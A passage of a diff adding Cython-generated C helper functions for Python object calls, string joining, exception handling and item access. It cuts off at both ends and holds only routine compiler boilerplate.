arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* pep479 */ +static void __Pyx_Generator_Replace_StopIteration(int in_async_gen) { + PyObject *exc, *val, *tb, *cur_exc; + __Pyx_PyThreadState_declare + #ifdef __Pyx_StopAsyncIteration_USED + int is_async_stopiteration = 0; + #endif + CYTHON_MAYBE_UNUSED_VAR(in_async_gen); + cur_exc = PyErr_Occurred(); + if (likely(!__Pyx_PyErr_GivenExceptionMatches(cur_exc, PyExc_StopIteration))) { + #ifdef __Pyx_StopAsyncIteration_USED + if (in_async_gen && unlikely(__Pyx_PyErr_GivenExceptionMatches(cur_exc, __Pyx_PyExc_StopAsyncIteration))) { + is_async_stopiteration = 1; + } else + #endif + return; + } + __Pyx_PyThreadState_assign + __Pyx_GetException(&exc, &val, &tb); + Py_XDECREF(exc); + Py_XDECREF(val); + Py_XDECREF(tb); + PyErr_SetString(PyExc_RuntimeError, + #ifdef __Pyx_StopAsyncIteration_USED + is_async_stopiteration ? "async generator raised StopAsyncIteration" : + in_async_gen ? "async generator raised StopIteration" : + #endif + "generator raised StopIteration"); +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* IterFinish */ +static CYTHON_INLINE int __Pyx_IterFinish(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); + if (unlikely(exc_type)) { + if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) + return -1; + __Pyx_PyErr_Clear(); + return 0; + } + return 0; +} + +/* UnpackItemEndCheck */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { + if (unlikely(retval)) { + Py_DECREF(retval); + __Pyx_RaiseTooManyValuesError(expected); + return -1; + } + return __Pyx_IterFinish(); +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* DictGetItem */ +#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY +static PyObject *__Pyx_PyDict_GetItem(PyObject *d, PyObject* key) { + PyObject *value; + value = PyDict_GetItemWithError(d, key); + if (unlikely(!value)) { + if (!PyErr_Occurred()) { + if (unlikely(PyTuple_Check(key))) { + PyObject* args = PyTuple_Pack(1, key); + if (likely(args)) { + PyErr_SetObject(PyExc_KeyError, args); + Py_DECREF(args); + } + } else { + PyErr_SetObject(PyExc_KeyError, key); + } + } + return NULL; + } + Py_INCREF(value); + return value; +} +#endif + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* UnpackUnboundCMethod */ +static PyObject *__Pyx_SelflessCall(PyObject *method, PyObject *args, PyObject *kwargs) { + PyObject *selfless_args = PyTuple_GetSlice(args, 1, PyTuple_Size(args)); + if (unlikely(!selfless_args)) return NULL; + PyObject *result = PyObject_Call(method, selfless_args, kwargs); + Py_DECREF(selfless_args); + return result; +} +static PyMethodDef __Pyx_UnboundCMethod_Def = { + "CythonUnboundCMethod", + __PYX_REINTERPRET_FUNCION(PyCFunction, __Pyx_SelflessCall), + METH_VARARGS | METH_KEYWORDS, + NULL +}; +static int __Pyx_TryUnpackUnboundCMethod(__Pyx_CachedCFunction* target) { + PyObject *method; + method = __Pyx_PyObject_GetAttrStr(target->type, *target->method_name); + if (unlikely(!method)) + return -1; + target->method = method; +#if CYTHON_COMPILING_IN_CPYTHON + #if PY_MAJOR_VERSION >= 3 + if (likely(__Pyx_TypeCheck(method, &PyMethodDescr_Type))) + #else + if (likely(!PyCFunction_Check(method))) + #endif + { + PyMethodDescrObject *descr = (PyMethodDescrObject*) method; + target->func = descr->d_method->ml_meth; + target->flag = descr->d_method->ml_flags & ~(METH_CLASS | METH_STATIC | METH_COEXIST | METH_STACKLESS); + } else +#endif +#if defined(CYTHON_COMPILING_IN_PYPY) +#elif PY_VERSION_HEX >= 0x03090000 + if (PyCFunction_CheckExact(method)) +#else + if (PyCFunction_Check(method)) +#endif + { + PyObject *self; + int self_found; +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + self = PyObject_GetAttrString(method, "__self__"); + if (!self) { + PyErr_Clear(); + } +#else + self = PyCFunction_GET_SELF(method); +#endif + self_found = (self && self != Py_None); +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + Py_XDECREF(self); +#endif + if (self_found) { + PyObject *unbound_method = PyCFunction_New(&__Pyx_UnboundCMethod_Def, method); + if (unlikely(!unbound_method)) return -1; + Py_DECREF(method); + target->method = unbound_method; + } + } + return 0; +} + +/* CallUnboundCMethod1 */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg) { + if (likely(cfunc->func)) { + int flag = cfunc->flag; + if (flag == METH_O) { + return (*(cfunc->func))(self, arg); + } else if ((PY_VERSION_HEX >= 0x030600B1) && flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, &arg, 1); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + #endif + } else if ((PY_VERSION_HEX >= 0x030700A0) && flag == (METH_FASTCALL | METH_KEYWORDS)) { + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, &arg, 1, NULL); + } + } + return __Pyx__CallUnboundCMethod1(cfunc, self, arg); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(1); + if (unlikely(!args)) goto bad; + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 0, arg); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg); + PyTuple_SET_ITEM(args, 1, arg); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(2, self, arg); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* CallUnboundCMethod2 */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2) { + if (likely(cfunc->func)) { + PyObject *args[2] = {arg1, arg2}; + if (cfunc->flag == METH_FASTCALL) { + #if PY_VERSION_HEX >= 0x030700A0 + return (*(__Pyx_PyCFunctionFast)(void*)(PyCFunction)cfunc->func)(self, args, 2); + #else + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + #if PY_VERSION_HEX >= 0x030700A0 + if (cfunc->flag == (METH_FASTCALL | METH_KEYWORDS)) + return (*(__Pyx_PyCFunctionFastWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, 2, NULL); + #endif + } + return __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2); +} +#endif +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2){ + PyObject *args, *result = NULL; + if (unlikely(!cfunc->func && !cfunc->method) && unlikely(__Pyx_TryUnpackUnboundCMethod(cfunc) < 0)) return NULL; +#if CYTHON_COMPILING_IN_CPYTHON + if (cfunc->func && (cfunc->flag & METH_VARARGS)) { + args = PyTuple_New(2); + if (unlikely(!args)) goto bad; + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 0, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 1, arg2); + if (cfunc->flag & METH_KEYWORDS) + result = (*(PyCFunctionWithKeywords)(void*)(PyCFunction)cfunc->func)(self, args, NULL); + else + result = (*cfunc->func)(self, args); + } else { + args = PyTuple_New(3); + if (unlikely(!args)) goto bad; + Py_INCREF(self); + PyTuple_SET_ITEM(args, 0, self); + Py_INCREF(arg1); + PyTuple_SET_ITEM(args, 1, arg1); + Py_INCREF(arg2); + PyTuple_SET_ITEM(args, 2, arg2); + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); + } +#else + args = PyTuple_Pack(3, self, arg1, arg2); + if (unlikely(!args)) goto bad; + result = __Pyx_PyObject_Call(cfunc->method, args, NULL); +#endif +bad: + Py_XDECREF(args); + return result; +} + +/* dict_getitem_default */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value) { + PyObject* value; +#if PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) + value = PyDict_GetItemWithError(d, key); + if (unlikely(!value)) { + if (unlikely(PyErr_Occurred())) + return NULL; + value = default_value; + } + Py_INCREF(value); + if ((1)); +#else + if (PyString_CheckExact(key) || PyUnicode_CheckExact(key) || PyInt_CheckExact(key)) { + value = PyDict_GetItem(d, key); + if (unlikely(!value)) { + value = default_value; + } + Py_INCREF(value); + } +#endif + else { + if (default_value == Py_None) + value = __Pyx_CallUnboundCMethod1(&__pyx_umethod_PyDict_Type_get, d, key); + else + value = __Pyx_CallUnboundCMethod2(&__pyx_umethod_PyDict_Type_get, d, key, default_value); + } + return value; +} + +/* SetItemInt */ +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v) { + int r; + if (unlikely(!j)) return -1; + r = PyObject_SetItem(o, j, v); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, int is_list, + CYTHON_NCP_UNUSED int wraparound, CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = (!wraparound) ? i : ((likely(i >= 0)) ? i : i + PyList_GET_SIZE(o)); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o)))) { + PyObject* old = PyList_GET_ITEM(o, n); + Py_INCREF(v); + PyList_SET_ITEM(o, n, v); + Py_DECREF(old); + return 1; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && 